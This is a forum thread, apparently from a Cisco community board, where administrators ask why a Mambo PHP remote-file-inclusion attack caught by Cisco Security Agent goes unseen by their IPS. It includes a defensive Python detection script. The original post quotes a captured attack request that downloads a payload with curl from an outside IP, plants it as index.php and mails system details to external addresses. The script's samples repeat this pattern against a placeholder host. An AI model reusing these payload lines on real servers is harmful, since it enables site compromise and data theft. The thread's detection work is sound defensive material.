PHP exploit triggers Cisco Security Agent but NOT in Cisco IPS....why?

enelson
Level 1

Does anyone know which signature this exploit should trigger with the Cisco IPS sensor? Not sure if there is one or if we have it turned off?

We see this exploit hit our Exchange Servers many times during the week.

The process 'C:\WINNT\System32\inetsrv\inetinfo.exe' (as user NT AUTHORITY\SYSTEM) received the data '/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid] =1&GLOBALS=&mosConfig_absolute_path=http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: //220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%20kkparole@yahoo.com;uname%20-a%20|%20mail%20-s%20uname_i2_66.224.194.188%20michaelroul@yahoo. com;echo|'.


5 Replies

fmeetz
Level 4

Remove the IPS config file from the router and copy the config after restarting it.

We have approx 40 sensors...we never see a correlation between a php exploit caught on CSA with the IPS.

Are you aware of a signature related to this exploit?

Could the php exploit be over 443? I do not believe CSA will tell you this. However, you could paste the url portion that CSA is reporting into a browser and send it to a web server over port 80 and see what the sensor does. What PHP exploit is this? Do you know if there is a Cisco sig out for this particular exploit?

M

mkirbyii
Level 1

I think this might be the mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for info. I searched on MySDN for mambo and found sig 5163 "Mambo Site Server Administrative Password ByPass". Here is an excerpt from the description: "Administrative access is gained by sending a specific url using the index2.php script and the PHPSESSID variable." This looks similar to what you pasted in. Notice "index2.php". Your IPS may not have seen this if it was over 443.

Hope this helps

M
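The answer above makes the key point: a network IPS cannot look inside a request that arrives over 443, while the host (here CSA on the Exchange server) sees it after decryption. The script below is an added example, not from this thread or from Cisco. It pulls the request out of a CSA-style alert line and checks a request URI for the indicators visible in the pasted alert: the index2.php script, _REQUEST[...]/GLOBALS overrides, mosConfig_absolute_path pointing at a remote URL, and a cmd= parameter carrying shell commands. The alert text, host names and function names are constructed for the example.

```python
"""Host-side check for Mambo-style remote file inclusion requests.

Added example (not code from the Cisco Community thread or from Cisco).
The IPS misses requests carried inside TLS on 443, but web server logs and
host agents such as CSA record the decrypted request, so the same
indicators can be checked there. Sample data below is constructed.
"""
import re
from urllib.parse import unquote

# Constructed CSA-style alert line (placeholder host names, not the real ones).
SAMPLE_CSA_LINE = (
    "The process 'C:\\WINNT\\System32\\inetsrv\\inetinfo.exe' (as user "
    "NT AUTHORITY\\SYSTEM) received the data '/index2.php?_REQUEST[option]="
    "com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path="
    "http://attacker.example/~photo/cm?&cmd=cd%20cache;curl%20-O%20"
    "http://attacker.example/~photo/cm;uname%20-a'."
)

# Constructed request URIs: benign, the attack pattern, and a local-path variant.
SAMPLE_REQUESTS = [
    "/index2.php?option=com_content&do_pdf=1&id=1",
    "/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&"
    "mosConfig_absolute_path=http://attacker.example/~photo/cm?&"
    "cmd=cd%20cache;curl%20-O%20http://attacker.example/~photo/cm;uname%20-a",
    "/index.php?option=com_content&mosConfig_absolute_path=/var/www/html",
]

CSA_DATA_RE = re.compile(r"received the data '([^']*)'")
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
SHELL_META_RE = re.compile(r"[;|`]|\$\(")
# Indicators that on their own justify an alert; index2.php alone is normal traffic.
STRONG_INDICATORS = {"superglobal_override", "config_override",
                     "remote_include", "command_injection"}


def extract_request(csa_line):
    """Return the request string quoted in a CSA 'received the data' alert, or None."""
    match = CSA_DATA_RE.search(csa_line)
    return match.group(1) if match else None


def parse_query(query):
    """Split a query string on '&' only and percent-decode keys and values.

    Done by hand rather than with urllib.parse.parse_qs so that the ';'
    inside an injected command is kept as part of the value on every
    Python version, and blank values such as GLOBALS= are preserved.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def analyze_request(uri):
    """Return the list of indicator names found in one request URI."""
    path, _, query = uri.partition("?")
    params = parse_query(query)
    findings = []
    # Mambo's index2.php admin script is the target named in sig 5163.
    if path.endswith("index2.php"):
        findings.append("index2.php")
    # Client-supplied _REQUEST[...] or GLOBALS keys try to overwrite PHP superglobals.
    if any(k.startswith("_REQUEST[") for k in params) or "GLOBALS" in params:
        findings.append("superglobal_override")
    # mosConfig_absolute_path is a server config value; a client should never send it.
    if "mosConfig_absolute_path" in params:
        findings.append("config_override")
        # A remote URL there means the include path is redirected to the attacker's host.
        if any(REMOTE_URL_RE.match(v) for v in params["mosConfig_absolute_path"]):
            findings.append("remote_include")
    # A cmd= parameter containing shell metacharacters is command injection.
    if any(SHELL_META_RE.search(v) for v in params.get("cmd", [])):
        findings.append("command_injection")
    return findings


def is_attack(findings):
    """True when at least one strong indicator is present."""
    return any(f in STRONG_INDICATORS for f in findings)


def scan_requests(uris):
    """Return (uri, findings) for every request that should raise an alert."""
    flagged = []
    for uri in uris:
        findings = analyze_request(uri)
        if is_attack(findings):
            flagged.append((uri, findings))
    return flagged


if __name__ == "__main__":
    print("From CSA line:", analyze_request(extract_request(SAMPLE_CSA_LINE)))
    for uri, findings in scan_requests(SAMPLE_REQUESTS):
        print("ALERT", uri, findings)
```

Run the same check over the IIS logs of the Exchange front end and a request that the sensor never saw on 443 will still show up; a plain index2.php hit is reported but not escalated, only the config, superglobal, remote-include and command indicators raise an alert.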

Interesting...the global signature for 5163 is retired/disabled globally by Cisco. This signature was published August of 2001 but IMHO should be enabled and deny packet/deny flow should be set to block this activity.
